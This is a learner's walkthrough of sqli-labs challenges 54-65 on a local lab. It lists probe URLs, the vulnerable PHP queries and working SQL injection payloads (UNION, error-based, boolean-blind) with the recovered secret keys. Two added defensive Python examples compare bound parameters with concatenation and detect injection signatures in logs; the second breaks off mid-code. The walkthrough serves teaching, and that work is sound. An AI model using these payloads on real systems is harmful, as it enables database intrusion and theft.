SQLI-LAB hands-on notes (Less 54 - Less 65)

  • Less - 54 Challenge-1
    • Test
    • Source Code
    • Solution
  • Less - 55 Challenge-2
    • Test
    • Source Code
    • Solution
  • Less - 56 Challenge-3
    • Test
    • Source Code
    • Solution
  • Less - 57 Challenge-4
    • Test
    • Source Code
    • Solution
  • Less - 58 Challenge-5
    • Test
    • Source Code
    • Solution
  • Less - 59 Challenge-6
    • Test
    • Source Code
    • Solution
  • Less - 60 Challenge-7
    • Test
    • Source Code
    • Solution
  • Less - 61 Challenge-8
    • Test
    • Source Code
    • Solution
  • Less - 62 Challenge-9
    • Test
    • Source Code
    • Solution
  • Less - 63 Challenge-10
    • Test
    • Source Code
    • Solution
  • Less - 64 Challenge-11
    • Test
    • Source Code
    • Solution
  • Less - 65 Challenge-12
    • Test
    • Source Code
    • Solution

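The following is just the record I wrote while working through the sqli-lab exercises; it is for reference only.

Because I have already studied some SQL injection, most of the content comes without explanation. If anything is unclear, please look it up with a search engine; I am sure you will find what you need.

Less - 54 Challenge-1

(Lesson 54: Challenge - 1)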

Test:

     http://localhost/sqli-lab/Less-54/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 10 attempts

Note: database name: challenges; maximum attempts: 10

     http://localhost/sqli-lab/Less-54/index.php?id=1') union select 1,2,3 --+

Note: the correct information is not displayed

     http://localhost/sqli-lab/Less-54/index.php?id=1' union select 1,2,3 --+

Note: works normally; id is wrapped in single quotes

Source Code:

// $id is concatenated into the query text inside single quotes
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
}else{
     //print_r(mysql_error());
}

Solution:

     http://localhost/sqli-lab/Less-54/index.php?id=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' --+
          //2x51x9lc2b

     http://localhost/sqli-lab/Less-54/index.php?id=0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='2x51x9lc2b' --+
          //id,sessid,secret_QD6G,tryy

     http://localhost/sqli-lab/Less-54/index.php?id=0' union select 1,group_concat(secret_QD6G),group_concat(sessid) from challenges.2x51x9lc2b --+
          //t5OPJLdkJ60DsyF7T1ZL3rfD
          //140491cdf5b17300fc51147a33ae86bf

Note: a regular-expression match reveals the table name and column name directly:
     http://localhost/sqli-lab/Less-54/index.php?id=0' union select 1,table_name,column_name from information_schema.columns where column_name regexp '^secret_[A-Z]{4}$' limit 0,1;

Less - 55 Challenge-2

(Lesson 55: Challenge - 2)

Test:

     http://localhost/sqli-lab/Less-55/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 14 attempts

Note: database name: challenges; maximum attempts: 14

     http://localhost/sqli-lab/Less-55/index.php?id=1' union select 1,2,3 --+

     http://localhost/sqli-lab/Less-55/index.php?id=1') union select 1,2,3 --+

     http://localhost/sqli-lab/Less-55/index.php?id=1" union select 1,2,3 --+

     http://localhost/sqli-lab/Less-55/index.php?id=1") union select 1,2,3 --+

Note: the correct information is not displayed

     http://localhost/sqli-lab/Less-55/index.php?id=1) union select 1,2,3 --+

Note: works normally; id is wrapped in one pair of parentheses

Source Code:

// $id is concatenated into the query text inside one pair of parentheses, unquoted
$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
     echo 'Your Login name:'. $row['username'];
     echo 'Your Password:' .$row['password'];
}else{
     //print_r(mysql_error());
}

Solution:

     http://localhost/sqli-lab/Less-55/index.php?id=0) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' --+
          // tyqb9xz99r

     http://localhost/sqli-lab/Less-55/index.php?id=0) union select 1,group_concat(column_name),3 from information_schema.columns where table_name='tyqb9xz99r' --+
          // id,sessid,secret_0LLE,tryy

     http://localhost/sqli-lab/Less-55/index.php?id=0) union select 1,group_concat(secret_0LLE),group_concat(sessid) from challenges.tyqb9xz99r --+
          // HvXC6g9NxUeGwZtpfdEYCtUO
          // 486412045b0a355f953e5aa5c8446bcb

Less - 56 Challenge-3

(Lesson 56: Challenge - 3)

Test:

     http://localhost/sqli-lab/Less-56/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 14 attempts

Note: database name: challenges; maximum attempts: 14

     http://localhost/sqli-lab/Less-56/index.php?id=1' union select 1,2,3 --+

Note: the correct information is not displayed

     http://localhost/sqli-lab/Less-56/index.php?id=1') union select 1,2,3 --+

     http://localhost/sqli-lab/Less-56/index.php?id=1" union select 1,2,3 --+

     http://localhost/sqli-lab/Less-56/index.php?id=1") union select 1,2,3 --+

Note: works normally; id is wrapped in double quotes and one pair of parentheses

Source Code:

// $id is concatenated into the query text inside single quotes and one pair of parentheses
$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
     echo 'Your Login name:'. $row['username'];
     echo 'Your Password:' .$row['password'];
}else{
     //print_r(mysql_error());
}

Solution:

     http://localhost/sqli-lab/Less-56/index.php?id=0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' --+
          // l1meh6v8xf

     http://localhost/sqli-lab/Less-56/index.php?id=0') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='l1meh6v8xf' --+
          // id,sessid,secret_ZIEU,tryy

     http://localhost/sqli-lab/Less-56/index.php?id=0') union select 1,group_concat(secret_ZIEU),group_concat(sessid) from challenges.l1meh6v8xf --+
          //3zjx2Ef32x2clWJlRlS4n2wc
          // 2de68a7c5e3db6a836ab8f5f109416b8
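
The query templates in the Source Code of Less 54 to 56 differ only in how $id is wrapped, and a probe is interpreted as SQL only when it closes that wrapper. The following added example (not part of the original notes or of the lab's code) runs those templates next to a fixed-text query with a bound parameter, which is what a prepared statement with a bound parameter gives you in PHP (mysqli or PDO). Assumptions: an in-memory SQLite table stands in for the MySQL table security.users, and the table contents and function names are made up for the demonstration.

```python
import re
import sqlite3

# Query templates from the lab source shown above (Less 54-56); "{id}" marks
# the spot where $id is concatenated into the SQL text.
TEMPLATES = {
    "Less-54": "SELECT * FROM users WHERE id='{id}' LIMIT 0,1",
    "Less-55": "SELECT * FROM users WHERE id=({id}) LIMIT 0,1",
    "Less-56": "SELECT * FROM users WHERE id=('{id}') LIMIT 0,1",
}

# Probe values from the Test steps above, URL-decoded ("--+" becomes "-- "),
# each keyed by the template whose wrapper it closes.
PROBES = {
    "Less-54": "0' union select 1,2,3 -- ",
    "Less-55": "0) union select 1,2,3 -- ",
    "Less-56": "0') union select 1,2,3 -- ",
}


def make_db():
    """Constructed stand-in for security.users (SQLite here, MySQL in the lab)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'Dumb', 'Dumb')")
    return conn


def lookup_concat(conn, template, raw_id):
    """The lab's pattern: the request value becomes part of the SQL text."""
    try:
        return conn.execute(template.format(id=raw_id)).fetchall()
    except sqlite3.Error:
        return None  # like the lab with print_r(mysql_error()) commented out


def lookup_bound(conn, raw_id):
    """Fixed SQL text; the value travels separately as a bound parameter."""
    return conn.execute("SELECT * FROM users WHERE id = ? LIMIT 0,1", (raw_id,)).fetchall()


def lookup_validated(conn, raw_id):
    """Bound parameter plus an allow-list check: id must be a short decimal number."""
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return []
    return lookup_bound(conn, int(raw_id))


def compare():
    """Run every probe against every template and against the bound query."""
    conn = make_db()
    results = {}
    for probe_name, probe in PROBES.items():
        for tmpl_name, template in TEMPLATES.items():
            results[(tmpl_name, probe_name)] = lookup_concat(conn, template, probe)
        results[("bound", probe_name)] = lookup_bound(conn, probe)
    return results


if __name__ == "__main__":
    for key, rows in compare().items():
        print(key, rows)
```

With concatenation, the probe that matches the wrapper returns the injected row (1, 2, 3); with the bound parameter the same string is compared as a value and matches nothing.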

Less - 57 Challenge-4

(Lesson 57: Challenge - 4)

Test:

     http://localhost/sqli-lab/Less-57/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 14 attempts

Note: database name: challenges; maximum attempts: 14

     http://localhost/sqli-lab/Less-57/index.php?id=1") union select 1,2,3 --+

Note: the correct information is not displayed

     http://localhost/sqli-lab/Less-57/index.php?id=1' union select 1,2,3 --+

     http://localhost/sqli-lab/Less-57/index.php?id=1') union select 1,2,3 --+

     http://localhost/sqli-lab/Less-57/index.php?id=1" union select 1,2,3 --+

Note: works normally; id is wrapped in double quotes

Source Code:

// $id is wrapped in double quotes, then concatenated into the query text
$id= '"'.$id.'"';
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
     echo 'Your Login name:'. $row['username'];
     echo 'Your Password:' .$row['password'];
}else{
     //print_r(mysql_error());
}

Solution:

     http://localhost/sqli-lab/Less-57/index.php?id=0" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' --+
          // la5spfxomc

     http://localhost/sqli-lab/Less-57/index.php?id=0" union select 1,group_concat(column_name),3 from information_schema.columns where table_name='la5spfxomc' --+
          // id,sessid,secret_D2E9,tryy

     http://localhost/sqli-lab/Less-57/index.php?id=0" union select 1,group_concat(secret_D2E9),group_concat(sessid) from challenges.la5spfxomc --+
          // AkXpuSMRL2Mjnxbu6ChgdDkI
          // 2c26f9a59b0ba61233e6fc0af8e47f14

Less - 58 Challenge-5

(Lesson 58: Challenge - 5)

Test:

     http://localhost/sqli-lab/Less-58/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 5 attempts

Note: database name: challenges; maximum attempts: 5

     http://localhost/sqli-lab/Less-58/index.php?id=1' union select 1,2,3 --+

Note: works normally

     http://localhost/sqli-lab/Less-58/index.php?id=1') union select 1,2,3 --+

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ') union select 1,2,3 -- ' LIMIT 0,1' at line 1

Note: id is wrapped in single quotes

Source Code:

// $id is concatenated into the query text inside single quotes
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
     // the page prints values from a fixed array, not the columns of the result row
     $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
     $pass = array_reverse($unames);
     echo 'Your Login name : '. $unames[$row['id']];
     echo 'Your Password : ' .$pass[$row['id']];
}else{
     print_r(mysql_error()); // MySQL error text is echoed to the page
}

Solution:

     http://localhost/sqli-lab/Less-58/index.php?id=0' union select 1,2,3 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a,database(),0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
          //qrso3pw6sh::challenges::1

     http://localhost/sqli-lab/Less-58/index.php?id=0' union select 1,2,3 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='qrso3pw6sh' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
          //id,sessid,secret_MV87,tryy::1

     http://localhost/sqli-lab/Less-58/index.php?id=0' union select 1,2,3 from (select count(*),concat((select concat(secret_MV87,0x3a, 0x3a) from challenges.qrso3pw6sh limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
          // 3XJM8hjFz6KNK5aoNUSApgRW::1

Less - 59 Challenge-6

(Lesson 59: Challenge - 6)

Test:

     http://localhost/sqli-lab/Less-59/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 5 attempts

Note: database name: challenges; maximum attempts: 5

     http://localhost/sqli-lab/Less-59/index.php?id=1' union select 1,2,3 --+

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' union select 1,2,3 -- LIMIT 0,1' at line 1

Note: there are no symbols around id

Source Code:

// $id is concatenated into the query text with no quotes or parentheses
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
     $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
     $pass = array_reverse($unames);
     echo 'Your Login name : '. $unames[$row['id']];
     echo 'Your Password : ' .$pass[$row['id']];
}else{
     print_r(mysql_error()); // MySQL error text is echoed to the page
}

Solution:

     http://localhost/sqli-lab/Less-59/index.php?id=0 union select 1,2,3 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a,database(),0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
          // b3ndcj1o8v::challenges::1

     http://localhost/sqli-lab/Less-59/index.php?id=0 union select 1,2,3 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='b3ndcj1o8v' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
          //id,sessid,secret_ZWS2,tryy::1

     http://localhost/sqli-lab/Less-59/index.php?id=0 union select 1,2,3 from (select count(*),concat((select concat(secret_ZWS2 ,0x3a, 0x3a) from challenges.b3ndcj1o8v limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
          // zhEVMVgMavK0k92OSv8zmTTm::1

Less - 60 Challenge-7

(Lesson 60: Challenge - 7)

Test:

     http://localhost/sqli-lab/Less-60/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 5 attempts

Note: database name: challenges; maximum attempts: 5

     http://localhost/sqli-lab/Less-60/index.php?id=1" union select 1,2,3 --+

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union select 1,2,3 -- ") LIMIT 0,1' at line 1

Note: id is wrapped in double quotes and one pair of parentheses

Source Code:

// $id is wrapped in double quotes and one pair of parentheses, then concatenated into the query text
$id = '("'.$id.'")';
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
     $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
     $pass = array_reverse($unames);
     echo 'Your Login name : '. $unames[$row['id']];
     echo 'Your Password : ' .$pass[$row['id']];
}else{
     print_r(mysql_error()); // MySQL error text is echoed to the page
}

Solution:

     http://localhost/sqli-lab/Less-60/index.php?id=0") union select 1,2,3 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a,database(),0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
          //p9gd2w7p0n::challenges::1

     http://localhost/sqli-lab/Less-60/index.php?id=0") union select 1,2,3 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='p9gd2w7p0n' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
          //id,sessid,secret_THZK,tryy::1

     http://localhost/sqli-lab/Less-60/index.php?id=0") union select 1,2,3 from (select count(*),concat((select concat(secret_THZK ,0x3a, 0x3a) from challenges.p9gd2w7p0n limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
          // OSpAsCGlNQ8qbUtTnEXHd0WL::1

Less - 61 Challenge-8

(Lesson 61: Challenge - 8)

Test:

     http://localhost/sqli-lab/Less-61/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 5 attempts

Note: database name: challenges; maximum attempts: 5

     http://localhost/sqli-lab/Less-61/index.php?id=1' union select 1,2,3 --+

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union select 1,2,3 -- ')) LIMIT 0,1' at line 1

Note: id is wrapped in single quotes and two pairs of parentheses

Source Code:

// $id is concatenated into the query text inside single quotes and two pairs of parentheses
$sql="SELECT * FROM security.users WHERE id=(('$id')) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
     $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
     $pass = array_reverse($unames);
     echo 'Your Login name : '. $unames[$row['id']];
     echo 'Your Password : ' .$pass[$row['id']];
}else{
     print_r(mysql_error()); // MySQL error text is echoed to the page
}

Solution:

     http://localhost/sqli-lab/Less-61/index.php?id=0')) union select 1,2,3 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a,database(),0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
          //t44dfrest6::challenges::1

     http://localhost/sqli-lab/Less-61/index.php?id=0')) union select 1,2,3 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='t44dfrest6' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
          //id,sessid,secret_BN4M,tryy::1

     http://localhost/sqli-lab/Less-61/index.php?id=0')) union select 1,2,3 from (select count(*),concat((select concat(secret_BN4M,0x3a, 0x3a) from challenges.t44dfrest6 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
          // dqlfs35mo8ZZlYKFZIvXboSe::1

Less - 62 Challenge-9

(Lesson 62: Challenge - 9)

Test:

     http://localhost/sqli-lab/Less-62/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 130 attempts

Note: database name: challenges; maximum attempts: 130

     http://localhost/sqli-lab/Less-62/index.php?id=1' union select 1,2,3 --+

Note: the correct information is not displayed

     http://localhost/sqli-lab/Less-62/index.php?id=1') union select 1,2,3 --+

Note: works normally; id is wrapped in single quotes and one pair of parentheses

Source Code:

// $id is concatenated into the query text inside single quotes and one pair of parentheses
$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
     $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
     $pass = array_reverse($unames);
     echo 'Your Login name : '. $unames[$row['id']];
     echo 'Your Password : ' .$pass[$row['id']];
}else{
     //print_r(mysql_error());
}

Solution:

     http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) > 97 --+

     http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) > 109 --+

     http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) > 115 --+

     http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) = 119 --+
          // first character of the table name: w
          // wlo99z7cua

     http://localhost/sqli-lab/Less-62/index.php?id=1') and (ord(substr((select column_name from information_schema.columns limit 2,1),8,1)) %26 16) = 16 --+

     http://localhost/sqli-lab/Less-62/index.php?id=1') and (ord(substr((select column_name from information_schema.columns limit 2,1),8,1)) %26 4) = 4 --+

     http://localhost/sqli-lab/Less-62/index.php?id=1') and (ord(substr((select column_name from information_schema.columns limit 2,1),8,1)) %26 2) = 2 --+
          // 10110 = 22; fourth character from the end of the column name: V
          // secret_VUBV

     http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select secret_VUBV from wlo99z7cua limit 0,1) ,1,1))) < 64 --+

     http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select secret_VUBV from wlo99z7cua limit 0,1) ,1,1))) < 53 --+

     http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select secret_VUBV from wlo99z7cua limit 0,1) ,1,1))) < 50 --+

     http://localhost/sqli-lab/Less-62/index.php?id=1') and (ord(substr((select secret_VUBV from wlo99z7cua limit 0,1),1,1)) %26 1) = 1 --+
          // first character of the key: 1
          // 1kqTprKdfAt6VGFEoEcpYgjG

Note: random values

The table name is 10 characters long, made up of lowercase letters and digits

The last four characters of secret_XXXX are made up of uppercase letters and digits

The key is 24 characters long, made up of uppercase and lowercase letters and digits


Less - 63 Challenge-10

(Lesson 63: Challenge - 10)

Test:

     http://localhost/sqli-lab/Less-63/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 130 attempts

Note: database name: challenges; maximum attempts: 130

     http://localhost/sqli-lab/Less-63/index.php?id=1') union select 1,2,3 --+

Note: the correct information is not displayed

     http://localhost/sqli-lab/Less-63/index.php?id=1' union select 1,2,3 --+

Note: works normally; id is wrapped in single quotes

Source Code:

// $id is concatenated into the query text inside single quotes
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
     $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
     $pass = array_reverse($unames);
     echo 'Your Login name : '. $unames[$row['id']];
     echo 'Your Password : ' .$pass[$row['id']];
}else{
     //print_r(mysql_error());
}

Solution:

     http://localhost/sqli-lab/Less-63/index.php?id=1' and (ascii(substr((select secret_8FVY from gelqg5ya7p limit 0,1) ,1,1))) > 64 --+

     http://localhost/sqli-lab/Less-63/index.php?id=1' and (ascii(substr((select secret_8FVY from gelqg5ya7p limit 0,1) ,1,1))) < 96 --+

     http://localhost/sqli-lab/Less-63/index.php?id=1' and (ascii(substr((select secret_8FVY from gelqg5ya7p limit 0,1) ,1,1))) < 77 --+

     http://localhost/sqli-lab/Less-63/index.php?id=1' and (ascii(substr((select secret_8FVY from gelqg5ya7p limit 0,1) ,1,1))) > 70 --+

     http://localhost/sqli-lab/Less-63/index.php?id=1' and (ascii(substr((select secret_8FVY from gelqg5ya7p limit 0,1) ,1,1))) < 73 --+

     http://localhost/sqli-lab/Less-63/index.php?id=1' and (ord(substr((select secret_8FVY from  gelqg5ya7p limit 0,1),1,1)) %26 1) = 1 --+
          // first character of the key: G
          //  Gd65kBLDXbCY7wrwRq5jzM4l

Less - 64 Challenge-11

(Lesson 64: Challenge - 11)

Test:

     http://localhost/sqli-lab/Less-64/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 130 attempts

Note: database name: challenges; maximum attempts: 130

     http://localhost/sqli-lab/Less-64/index.php?id=1' union select 1,2,3 --+

     http://localhost/sqli-lab/Less-64/index.php?id=1') union select 1,2,3 --+

     http://localhost/sqli-lab/Less-64/index.php?id=1" union select 1,2,3 --+

     http://localhost/sqli-lab/Less-64/index.php?id=1") union select 1,2,3 --+

     http://localhost/sqli-lab/Less-64/index.php?id=1) union select 1,2,3 --+

Note: the correct information is not displayed

     http://localhost/sqli-lab/Less-64/index.php?id=1)) union select 1,2,3 --+

Note: works normally; id is wrapped in two pairs of parentheses

Source Code:

// $id is concatenated into the query text inside two pairs of parentheses, unquoted
$sql="SELECT * FROM security.users WHERE id=(($id)) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
     $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
     $pass = array_reverse($unames);
     echo 'Your Login name : '. $unames[$row['id']];
     echo 'Your Password : ' .$pass[$row['id']];
}else{
     //print_r(mysql_error());
}

Solution:

     http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from  tsgl6i8osu limit 0,1) ,1,1))) > 64 --+

     http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from  tsgl6i8osu limit 0,1) ,1,1))) > 97 --+

     http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from tsgl6i8osu limit 0,1) ,1,1))) < 109 --+

     http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from tsgl6i8osu limit 0,1) ,1,1))) < 106 --+

     http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from tsgl6i8osu limit 0,1) ,1,1))) < 104 --+

     http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from tsgl6i8osu limit 0,1) ,1,1))) = 103 --+
          // first character of the key: g
          //  gpu9QBywZI8jL2M7Uj6DDELa

Less - 65 Challenge-12

(Lesson 65: Challenge - 12)

Test:

     http://localhost/sqli-lab/Less-65/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 130 attempts

Note: database name: challenges; maximum attempts: 130

     http://localhost/sqli-lab/Less-65/index.php?id=1" union select 1,2,3 --+

Note: the correct information is not displayed

     http://localhost/sqli-lab/Less-65/index.php?id=1' union select 1,2,3 --+

     http://localhost/sqli-lab/Less-65/index.php?id=1') union select 1,2,3 --+

     http://localhost/sqli-lab/Less-65/index.php?id=1") union select 1,2,3 --+

Note: works normally; id is wrapped in double quotes and one pair of parentheses

Source Code:

// $id is wrapped in double quotes, then concatenated inside one pair of parentheses
$id = '"'.$id.'"';
$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
     $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
     $pass = array_reverse($unames);
     echo 'Your Login name : '. $unames[$row['id']];
     echo 'Your Password : ' .$pass[$row['id']];
}else{
     //print_r(mysql_error());
}

Solution:

     http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) > 64 --+

     http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) < 97 --+

     http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) > 77 --+

     http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) > 84 --+

     http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) < 88 --+

     http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) > 85 --+

     http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) = 87 --+
          // first character of the key: W
          // Wa0mYczFC0wFXygjAFaCA1Tb
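
Seen from the server side, the requests recorded in Less 54 to 65 fall into three recognisable families: UNION queries against information_schema, the floor(rand(0)*2) error-based form, and ascii/ord(substr()) boolean probes that repeat with only a constant changed. The following added example, which is not part of the original notes, classifies access-log lines by those families and flags clients whose probes repeat in shape. Assumptions: the combined log format, the client addresses, the signature names, the threshold and the sample lines are all constructed for the demonstration.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import parse_qs, urlsplit

# Signatures for the families used on this page; each is matched against the
# URL-decoded parameter value.
SIGNATURES = [
    ("schema-enumeration", re.compile(r"information_schema\s*\.\s*(tables|columns)", re.I)),
    ("union-based", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("error-based", re.compile(
        r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\).*\bgroup\s+by\b", re.I | re.S)),
    ("boolean-blind", re.compile(r"\b(ascii|ord)\s*\(\s*substr(ing)?\s*\(", re.I)),
]

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def log_line(client, target):
    """Build one constructed access-log line in combined log format."""
    return f'{client} - - [03/Aug/2024:09:40:00 +0000] "GET {target} HTTP/1.1" 200 512'


BLIND_TARGET = ("/sqli-lab/Less-62/index.php?id=1%27)%20and%20(ascii(substr((select%20table_name"
                "%20from%20information_schema.tables%20where%20table_schema=database()"
                "%20limit%200,1),1,1)))%20%3E%20{n}%20--+")

# Constructed sample log; the payloads follow the ones listed on this page, URL-encoded.
SAMPLE_LOG = [
    log_line("10.0.0.9", "/sqli-lab/Less-54/index.php?id=1"),
    log_line("10.0.0.5", "/sqli-lab/Less-54/index.php?id=0%27%20union%20select%201,"
             "group_concat(table_name),3%20from%20information_schema.tables%20--+"),
    log_line("10.0.0.5", "/sqli-lab/Less-58/index.php?id=0%27%20union%20select%201,2,3%20from%20"
             "(select%20count(*),concat(database(),floor(rand(0)*2))x%20from%20"
             "information_schema.tables%20group%20by%20x)a%20--+"),
    *[log_line("10.0.0.5", BLIND_TARGET.format(n=n)) for n in (97, 109, 115)],
    log_line("10.0.0.9", "/sqli-lab/Less-54/index.php?id=2"),
]


def classify(value):
    """Return the names of all signatures that match one decoded parameter value."""
    return [name for name, rx in SIGNATURES if rx.search(value)]


def shape(value):
    """Collapse numbers so probes that differ only in a constant compare equal."""
    return re.sub(r"\d+", "N", value.lower())


def analyse(lines, repeat_threshold=3):
    """Per client: techniques seen, and whether one probe shape keeps repeating."""
    techniques = defaultdict(set)
    shapes = defaultdict(Counter)
    for line in lines:
        match = REQUEST.match(line)
        if not match:
            continue
        client, target = match.groups()
        for values in parse_qs(urlsplit(target).query).values():
            for value in values:
                hits = classify(value)
                if hits:
                    techniques[client].update(hits)
                    shapes[client][shape(value)] += 1
    return {
        client: {
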